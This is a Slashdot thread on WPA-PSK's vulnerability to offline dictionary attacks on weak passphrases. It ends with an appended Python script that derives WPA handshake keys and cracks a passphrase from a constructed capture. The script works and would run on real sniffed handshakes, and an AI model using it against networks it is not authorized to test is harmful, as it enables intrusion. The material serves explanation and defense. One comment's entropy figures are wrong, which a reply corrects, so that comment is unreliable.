New Wireless Security Standard Has Old Problem?
eggboard writes "Wireless security expert Robert Moskowitz, who sits on IEEE and IETF committees on that subject, sent me a short paper on a glaring weakness in the Wi-Fi Protected Access (WPA) protocol that's replacing the weak and broken WEP system well discussed here at Slashdot. His paper, which I've posted here, proves definitively that while WPA itself remains robust and secure, the interface for choosing consumer passwords makes it simple to snarf a tiny bit of network traffic and perform an offline dictionary attack. For Slashdot readers, this probably seems trivial, but because Linksys, Apple, and others are letting users enter My Dog Has Fleas as their passphrase, WPA might be less secure for home users than WEP."
Big deal (Score:5, Informative)
Only long passwords and encouraging the users to use good quality passwords/phrases really helps.
Ultimately though, these passphrases are flawed anyway: they are a form of shared password. History has shown this to be a thoroughly bad idea; one passphrase per user/machine is a far better idea, and even the user shouldn't know what it is (that way it can't get beaten out of them; black cosh cryptography works pretty darn well). These standards organisations aren't even trying.
Mirror (Score:1, Informative)
This is *Supposed* to be hard (Score:5, Informative)
Thus when you perform your offline dictionary attack, for each lookup in the dictionary you must perform 4096 HMAC-SHA1s, and this might take some time if you are looking up a large number of dictionary entries.
The basic conflict is the wide disparity between the power of processors in low-end 802.11 transceivers and high-end computers. The time to compute the 4096 HMAC-SHA1s is significant on, say, a slow ARM7TDMI, and the 4096 value is a compromise to limit the delay in computing this. This delay affects the time from pressing return on the keyboard to the time the PTK can be known and communications can begin.
However, the attacker can apply his cluster of 3GHz PCs, or his FPGA HMAC-SHA1 parallel processor, or his supercomputer array, and make the speed of dictionary lookups relatively insignificant compared against the strength of the passwords being used.
The wise people asked for a much higher number than 4096. Some implementation types beat it down to 4096, and here we are...
Re:WEP newbie question - how bad is it? (Score:3, Informative)
And yes, this is from experience. I will neither confirm nor deny that I was given permission to try this...
Re:WEP newbie question - how bad is it? (Score:5, Informative)
Ars Technica has a good summary of what you can do with SSIDs and WEP to improve your wireless network's security:
Security Practicum: Essential Home Wireless Security Practices [arstechnica.com]
Re:WEP newbie question - how bad is it? (Score:4, Informative)
Just enable the WEP, use secure applications for sensitive data, and quit worrying about it.
Re:WEP newbie question - how bad is it? (Score:3, Informative)
Now, if a bank or hospital was going to install a wireless wep on a campus with account passwords etc in the air in the parking lot, then you'd have good reason to worry.
Re:My Dog Has Fleas (Score:5, Informative)
The only practical way to find that password is through brute force. In this scenario, the longer the password and the more possible different characters (i.e. lowercase and uppercase, and spaces), the more difficult it is. Thus, 'My Dog has Fleas' would be more secure than 'mdhfaymdt' against a brute force attack. The latter could be broken in a matter of hours through brute force.
Re:one for the crypto/math freaks (Score:3, Informative)
Cryptography is not for the math-impaired (Score:2, Informative)
assuming there are about 10K words in common vocabulary, and you use 10 words, that's about 10,000^10. pretty large, but only about 23 bits.
10,000^10 ~ (2^13.3)^10 = 2^133 = 133 bits of encryption.
but your 20 character password has a huge entropy. you have 26 lowercase letters, 26 uppercase letters, 10 numbers and about 10 punctuation marks. that's 66 possibilities per character. now 72^20 is a lot. that's about 26 bits.
66 possibilities * 20 chars ~ (2^6)^20 = 2^120 = 120 bits of encryption.
Re:At least use WEP! (Score:5, Informative)
Instead, we've segregated all of the WAPs onto a dead-end network where the users have to VPN into our LAN through a border server. (Basically treating them as if they were outside the office and coming in from an external ISP.)
Works pretty well, other than having to remember to VPN into the network. The traffic ends up encrypted (inside of the VPN tunnel), so it's not possible to sniff passwords.
Re:Cryptography is not for the math-impaired (Score:4, Informative)
Re:WEP newbie question - how bad is it? (Score:2, Informative)
WEP isn't that bad to begin with (Score:4, Informative)
Home users are going to generate less traffic than businesses, and so it will take even longer to get enough traffic. Unless you happen to notice a van parked outside your house for a couple days, or find yourself staring down the barrel of a pringles can, you can relax.
Re:Kerberos (Score:2, Informative)
* there are some known systems that use passwords but which are not susceptible to this attack, involving a carefully bound combination of passwords and a Diffie-Hellman exchange. I don't have a reference to hand, but such a system exists. Kerberos isn't it, though.
Krill
Re:one for the crypto/math freaks (Score:2, Informative)
When possible, it is nice to find an algorithm or a protocol that allows two parties to authenticate without actually revealing enough information to identify the key.
The lowest level of security would be where everything is out in the open for any observer -- they still have to observe, but one observation is all that is needed. For example, if you hand somebody your credit card, they have all of the information necessary to use it to steal from you -- it is all there on the card, perfectly legible. As another example, if you walk up to a terminal and type your password, anybody with a camera pointed at the keyboard or some kind of electronic keylogger will be able to record your name and password on the wire, and then they know everything they need to know to take over your account.
Things are slightly more secure when some additional work is required after getting the information. The old-school UNIX passwd file with encrypted passwords out in the open was like this -- anybody could copy the passwd file, but they would then have to run a cracker on it for a few weeks or months before anything useful showed up. Now that computers are faster and security is more of an issue, the passwd file is shadowed so that the passwd file doesn't actually have the encrypted passwords, which is a good thing because the original crypt algorithm can now be cracked pretty easily. This exploit is similar -- you can watch a session initiation, and with only that info, you can crack the password.
There is a third category of transaction security, where even after observing the entire transaction, an eavesdropper doesn't have enough information to impersonate you. Generally, this takes the form of challenge-response. The server asks "42365?" and you answer "92581!" which is the correct answer. But an observer still doesn't know how to impersonate you, because next time, the server will ask "98765?" and the observer doesn't know that the answer is "45678!". Smart cards are like this, which is why they are more secure than credit cards or passwords.
Each of these three categories still has varying degrees of security.
In the first case, it is easy to use the information from a stolen credit card, but it would be pretty hard to make use of the information from a retinal scan. In both cases, you have all the information, but it's quite a pain to get your eyes replaced (if you get hungry, there's a sandwich and some milk in the fridge...).
In the second case, while reversing a crypt password isn't too tough anymore, it still takes a bit of work to reverse engineer a 1024-bit RSA key. In both cases, the information is out in the clear, but factoring a 1024-bit number is a lot more work than running the crypt algorithm a few billion times.
In the third case, "Mary had a what?" --> "Little lamb!" is easier than a smart card transaction.
While we would love to have a cryptographically strong variation on the third case for every possible authentication/encryption transaction, it just isn't practical. In the case of WEP/WAP/Whatever, there are a lot of limitations to work around. It has to work on cheap hardware, it has to be fast enough to handle the traffic, it has to work in the face of many dropped packets, it can't inconvenience the user too much, etc.
While I can think of a few things that I might have done differently, it seems like the new protocol is decent, given the limitations they were facing. While I wouldn't want to trust top-secret information to it, it seems that it is good enough for the average Joe.
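The two technical threads above, the 4096-iteration PBKDF2 cost in "This is *Supposed* to be hard" and the three categories of observability in this comment, can be put side by side in one runnable sketch. The following is an added example, not code from any poster or from the WPA specification's authors: it derives the WPA-Personal PSK (PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID, 4096 iterations, 256 bits), expands it to a PTK with the 802.11i PRF, computes the message-2 MIC as the WPA2 (key descriptor version 2, HMAC-SHA1) 4-way handshake does, and then plays the attacker: replaying the sniffed MIC against a fresh ANonce fails (the challenge-response property), but an offline dictionary run against the same capture recovers "My Dog Has Fleas". The SSID, MAC addresses, nonces and the zero-filled EAPOL-Key body are constructed assumptions; a real attack uses the fields from the sniffed frames. The first known-answer check uses the IEEE 802.11i Annex H.4.1 vector (passphrase "password", SSID "IEEE").

```python
"""WPA-PSK handshake derivation and offline dictionary attack (example, constructed capture)."""
import hashlib
import hmac
import time

PBKDF2_ITERATIONS = 4096  # fixed by the standard; the only brake on offline guessing


def wpa_psk(passphrase: str, ssid: bytes) -> bytes:
    """PSK (the PMK in WPA-Personal) = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 256 bits).
    A 32-byte output needs two SHA-1-sized blocks, so each guess costs 2 x 4096 HMAC calls."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid, PBKDF2_ITERATIONS, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || counter) blocks."""
    out, counter = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs || min/max of the nonces)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)


def eapol_mic(ptk: bytes, eapol_frame: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): MIC = first 16 bytes of HMAC-SHA1 keyed with the
    KCK (PTK bytes 0..15) over the EAPOL-Key frame with its MIC field zeroed."""
    return hmac.new(ptk[:16], eapol_frame, hashlib.sha1).digest()[:16]


# Constructed capture: what a sniffer sees in messages 1 and 2 of the handshake.
SSID = b"linksys"                        # assumed SSID; it is also the PBKDF2 salt
AP_MAC = bytes.fromhex("000c41aabbcc")   # hypothetical authenticator address
STA_MAC = bytes.fromhex("00111122dd33")  # hypothetical supplicant address
EAPOL_M2_ZEROED_MIC = bytes(99)          # placeholder EAPOL-Key body (real attack: sniffed frame)
TRUE_PASSPHRASE = "My Dog Has Fleas"     # used only to build the capture, never by crack()


def make_capture(passphrase: str, anonce: bytes, snonce: bytes) -> dict:
    """Play AP and client to produce exactly the fields an eavesdropper records."""
    ptk = derive_ptk(wpa_psk(passphrase, SSID), AP_MAC, STA_MAC, anonce, snonce)
    return {"ssid": SSID, "aa": AP_MAC, "spa": STA_MAC, "anonce": anonce, "snonce": snonce,
            "eapol": EAPOL_M2_ZEROED_MIC, "mic": eapol_mic(ptk, EAPOL_M2_ZEROED_MIC)}


CAPTURE = make_capture(TRUE_PASSPHRASE, anonce=bytes(range(32)), snonce=bytes(range(32, 64)))


def mic_for_guess(capture: dict, guess: str) -> bytes:
    """Everything except the passphrase is in the capture, so each guess can be checked offline."""
    pmk = wpa_psk(guess, capture["ssid"])
    ptk = derive_ptk(pmk, capture["aa"], capture["spa"], capture["anonce"], capture["snonce"])
    return eapol_mic(ptk, capture["eapol"])


def crack(capture: dict, wordlist) -> tuple:
    """Offline dictionary attack. Returns (passphrase or None, guesses tried, seconds spent)."""
    start, tried = time.perf_counter(), 0
    for tried, guess in enumerate(wordlist, 1):
        if hmac.compare_digest(mic_for_guess(capture, guess), capture["mic"]):
            return guess, tried, time.perf_counter() - start
    return None, tried, time.perf_counter() - start


def replay_succeeds(capture: dict, fresh_anonce: bytes) -> bool:
    """AP side: a replayed message 2 is checked against the ANonce the AP issued *this* time.
    With a fresh ANonce the expected MIC differs, so observation alone does not let you join."""
    ptk = derive_ptk(wpa_psk(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC, fresh_anonce, capture["snonce"])
    return hmac.compare_digest(eapol_mic(ptk, capture["eapol"]), capture["mic"])


def check_known_vector() -> bool:
    """IEEE 802.11i Annex H.4.1: passphrase "password", SSID "IEEE"."""
    expected = bytes.fromhex("f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")
    return wpa_psk("password", b"IEEE") == expected


if __name__ == "__main__":
    wordlist = ["password", "linksys", "My Dog Has Fleas", "correct horse battery staple"]
    found, tried, secs = crack(CAPTURE, wordlist)
    print(f"known vector ok: {check_known_vector()}")
    print(f"recovered {found!r} after {tried} guesses, {secs / tried * 1000:.1f} ms per guess")
    print(f"replay against fresh ANonce accepted: {replay_succeeds(CAPTURE, bytes(32))}")
```

The per-guess figure printed by the script is the whole defence: a few milliseconds on one CPU core, and that is before the attacker splits the wordlist across machines. Note that the two-block PBKDF2 output doubles the HMAC count to 8192 per guess, which changes nothing about the conclusion. Original WPA (TKIP, key descriptor version 1) computes the MIC with HMAC-MD5 instead of HMAC-SHA1; the PSK and PTK derivation above is the same for both.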